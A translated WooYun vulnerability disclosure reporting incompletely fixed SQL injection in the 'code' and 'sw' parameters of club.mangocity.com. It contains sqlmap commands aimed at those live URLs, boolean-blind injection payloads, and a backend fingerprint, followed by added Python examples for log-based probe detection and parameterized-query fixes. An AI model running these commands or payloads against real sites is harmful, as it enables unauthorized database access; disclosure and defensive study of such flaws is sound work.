
Vulnerability summary

Defect ID: wooyun-2015-0146048

Title: Incomplete fix on a 芒果网 (Mangocity) subdomain leaves SQL injection in place (one of them an OR-type injection)

Vendor: 芒果网 (Mangocity)

Author: 路人甲

Submitted: 2015-10-12 12:00

Fix time: 2015-10-17 12:02

Published: 2015-10-17 12:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-12: Details sent to the vendor, awaiting vendor handling
2015-10-17: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Two parameters still need further filtering!

Detailed description:

Injection point one (injection not successful):

http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen


When I tested this earlier, I found the fix was incomplete and the injection was still there!
As follows:

sqlmap.py -u "http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen" --threads 10 --dbms "MySQL"


[screenshot: 1.jpg]


GET parameter 'code' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 69 HTTP(s) requests:
---
Place: GET
Parameter: code
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=xiamen' AND 1236=1236 AND 'JgJI'='JgJI
---
[23:02:16] [INFO] testing MySQL
[23:02:32] [WARNING] the back-end DBMS is not MySQL
[23:02:32] [INFO] testing Oracle
[23:02:47] [WARNING] the back-end DBMS is not Oracle
[23:02:47] [INFO] testing PostgreSQL
[23:03:02] [WARNING] the back-end DBMS is not PostgreSQL
[23:03:02] [INFO] testing Microsoft SQL Server
[23:03:02] [INFO] confirming Microsoft SQL Server
[23:03:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
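From the defender's side, the boolean-based blind finding above has a recognisable footprint in the web server's access log: the same client sends the same parameter with a closing quote, a boolean operator and a comparison, once as a true condition and once as a false one, and repeats this many times (69 requests in the run above). The following Python script is an added example, not part of the original report or of the vendor's tooling. It parses constructed Common Log Format lines and flags that shape. The client addresses and timestamps are made up; the 'code' probe is the payload quoted in the report, its "false" twin and the 'sw' probe are constructed in the same shape.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log (Common Log Format). Client addresses and
# timestamps are made up; the first 'code' probe is the sqlmap payload quoted
# in the report, the second is a constructed "false" twin (a boolean-blind
# test sends one true and one false condition), and the 'sw' probe reuses the
# report's second payload shape against the second injection point.
SAMPLE_LOG = """\
1.2.3.4 - - [12/Oct/2015:23:02:16 +0800] "GET /comment/scenicspot/scenicindex.aspx?code=xiamen HTTP/1.1" 200 5120
1.2.3.4 - - [12/Oct/2015:23:02:17 +0800] "GET /comment/scenicspot/scenicindex.aspx?code=xiamen%27%20AND%201236%3D1236%20AND%20%27JgJI%27%3D%27JgJI HTTP/1.1" 200 5120
1.2.3.4 - - [12/Oct/2015:23:02:18 +0800] "GET /comment/scenicspot/scenicindex.aspx?code=xiamen%27%20AND%201236%3D1237%20AND%20%27JgJI%27%3D%27JgJI HTTP/1.1" 200 310
5.6.7.8 - - [12/Oct/2015:23:05:00 +0800] "GET /act/toptraveller/show.aspx?type=1&sw=111111 HTTP/1.1" 200 4400
1.2.3.4 - - [12/Oct/2015:23:05:01 +0800] "GET /act/toptraveller/show.aspx?type=1&sw=111111%27%20AND%208251%3D8251%20AND%20%27nHZR%27%3D%27nHZR HTTP/1.1" 503 0
"""

# One CLF request line: client, identity, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Shape of a boolean-based blind probe after URL decoding: a quote that closes
# the original string literal, a boolean operator, then a comparison.
PROBE_RE = re.compile(r"""['"]\s*(?:AND|OR)\s+[^=]+=\s*\S""", re.IGNORECASE)


def parse_line(line):
    """Split one CLF line into its fields plus decoded query parameters, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl URL-decodes names and values, so %27 becomes a quote here.
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def find_probes(log_text):
    """Return one finding per request whose parameter value matches PROBE_RE."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            if PROBE_RE.search(value):
                findings.append({
                    "ip": rec["ip"], "path": rec["path"], "param": name,
                    "status": int(rec["status"]), "value": value,
                })
    return findings


def summarize(findings):
    """Count probes per (client, path, parameter); repeated probes against one
    parameter are the signature of an automated scan rather than a stray quote."""
    counts = {}
    for f in findings:
        key = (f["ip"], f["path"], f["param"])
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for key, n in summarize(find_probes(SAMPLE_LOG)).items():
        print(f"{key[0]} -> {key[1]} param={key[2]!r}: {n} probe(s)")
```

The per-parameter count is the useful alert key: a single quoted value can be a typo, but a run of them against one parameter from one client, especially alongside the burst of 503 responses the report records, is a scanner at work. Decoding before matching matters, since the probe arrives percent-encoded and the raw request line would not match.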


But when I tested again recently it no longer worked; the injection is still there, it probably just needs a bypass now!

sqlmap.py -u "http://club.mangocity.com/comment/scenicspot/scenicindex.aspx?code=xiamen" --threads 10 --dbms "MySQL" -p code --level 5 --risk 3 --technique BT


That test did not succeed, and with my limited ability I did not go on trying to bypass the filter.

[screenshot: 1.jpg]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: code
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=xiamen' AND 8251=8251 AND 'nHZR'='nHZR
---
[18:30:24] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[18:30:24] [INFO] testing MySQL
[18:30:39] [WARNING] the back-end DBMS is not MySQL
[18:30:39] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system. Support for this DBMS will be implemented at some point
[18:30:39] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 1 times


Injection point two:

http://club.mangocity.com/act/toptraveller/show.aspx?type=1&sw=111111


The fix for the sw parameter is incomplete; it can still be injected.
Test result without --level 5 --risk 3: no injection possible.

sqlmap.py -u "http://club.mangocity.com/act/toptraveller/show.aspx?type=1&sw=111111" --threads 10 --dbms "Microsoft SQL Server" --level 5 --risk 3 -p sw


[screenshot: --level 1-1.jpg]


[00:38:25] [INFO] testing connection to the target URL
[00:38:25] [INFO] testing if the target URL is stable. This can take a couple of seconds
[00:38:26] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[00:38:27] [INFO] testing if GET parameter 'type' is dynamic
[00:38:28] [WARNING] GET parameter 'type' does not appear dynamic
[00:38:43] [WARNING] heuristic (basic) test shows that GET parameter 'type' might not be injectable
[00:38:43] [INFO] testing for SQL injection on GET parameter 'type'
[00:38:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:41:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[00:42:59] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[00:43:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[00:43:14] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[00:44:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[00:46:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[00:51:26] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[01:13:02] [WARNING] GET parameter 'type' is not injectable
[01:13:02] [INFO] testing if GET parameter 'sw' is dynamic
[01:13:02] [WARNING] GET parameter 'sw' does not appear dynamic
[01:13:02] [WARNING] heuristic (basic) test shows that GET parameter 'sw' might not be injectable
[01:13:02] [INFO] testing for SQL injection on GET parameter 'sw'
[01:13:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[01:13:02] [WARNING] reflective value(s) found and filtering out
[01:13:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[01:14:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[01:14:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[01:15:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[01:16:47] [INFO] testing 'Generic UNION query (15) - 1 to 10 columns'
[01:16:50] [INFO] target URL appears to be UNION injectable with 2 columns
[01:16:53] [INFO] target URL appears to be UNION injectable with 5 columns
[01:20:42] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[01:21:49] [INFO] target URL appears to have 1 column in query
[01:22:49] [WARNING] GET parameter 'sw' is not injectable
[01:22:49] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Please retry with the switch '--text-only' (along with --technique=BU) as this case looks like a perfect candidate (low textual content along with inability of comparison engine to detect at least one dynamic parameter). Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
[01:22:49] [WARNING] HTTP error codes detected during run:
503 (Service Unavailable) - 147 times


Test results after adding --level 5 --risk 3 are shown in the screenshots below

sqlmap.py -u "http://club.mangocity.com/act/toptraveller/show.aspx?type=1&sw=111111" --threads 10 --dbms "Microsoft SQL Server" --level 5 --risk 3


[screenshots: --level 5-1.jpg, --level 5-2.jpg, --level 5-3.jpg, --level 5-4.jpg]

Proof of vulnerability:

[screenshots: --level 5-1.jpg, --level 5-2.jpg, --level 5-3.jpg, --level 5-4.jpg]

Fix recommendation:

Continue the filtering fix until it is complete
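The report's remedy is to keep tightening the input filter, which is exactly what left the boolean-blind channel open the first time: a filter narrows what a probe can look like, a bound parameter removes the channel. The following Python snippet is an added example, not from the report or the vendor. It uses an in-memory SQLite table as a stand-in for the SQL Server backend fingerprinted above (table, rows and the lowercase-word policy for `code` are assumptions). The concatenating query answers differently to the report's true probe and to a constructed false twin, and that one-bit difference is the entire blind channel; the parameterized query answers identically to both, and an allow-list on `code` rejects the value before it reaches SQL at all.

```python
import re
import sqlite3

# Constructed allow-list for scenic-spot codes: the report's value is "xiamen",
# so a lowercase ASCII word is assumed to be the legitimate format.
CODE_RE = re.compile(r"[a-z]{2,32}")

# The report's boolean-blind payload and a constructed "false" twin.
TRUE_PROBE = "xiamen' AND 1236=1236 AND 'JgJI'='JgJI"
FALSE_PROBE = "xiamen' AND 1236=1237 AND 'JgJI'='JgJI"


def make_db():
    """In-memory SQLite stand-in for the backend; table and rows are assumed."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE scenic_spot (code TEXT, name TEXT)")
    conn.executemany("INSERT INTO scenic_spot VALUES (?, ?)",
                     [("xiamen", "Xiamen"), ("beijing", "Beijing")])
    return conn


def find_by_code_concat(conn, code):
    """The bug pattern: input spliced into SQL text. Shown only for contrast."""
    sql = "SELECT name FROM scenic_spot WHERE code = '%s'" % code
    return [row[0] for row in conn.execute(sql)]


def find_by_code_param(conn, code):
    """The fix: the value is bound as a parameter and can never alter the query."""
    sql = "SELECT name FROM scenic_spot WHERE code = ?"
    return [row[0] for row in conn.execute(sql, (code,))]


def validate_code(code):
    """Reject anything outside the allow-list before it reaches the database."""
    if not CODE_RE.fullmatch(code):
        raise ValueError("invalid scenic-spot code")
    return code


def lookup(conn, code):
    """Request-handler shape: validate, then query with a bound parameter."""
    return find_by_code_param(conn, validate_code(code))


def blind_oracle_present(query_fn, conn):
    """True when the true/false probe pair yields different results, i.e. when
    the query leaks one bit per request to a boolean-based blind test."""
    return query_fn(conn, TRUE_PROBE) != query_fn(conn, FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    print("concatenation leaks a bit:", blind_oracle_present(find_by_code_concat, db))
    print("bound parameter leaks a bit:", blind_oracle_present(find_by_code_param, db))
    print("legitimate lookup:", lookup(db, "xiamen"))
```

On the ASP.NET / SQL Server stack the report fingerprints, the same change is a SqlCommand whose values are supplied through SqlParameter objects instead of being concatenated into the command text; the allow-list check belongs in the page handler in front of it. Note that SQL Server 2000, which sqlmap identified here, is long out of support, so the filter-versus-parameter question is not the only one the findings raise.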

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2015-10-17 12:02

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet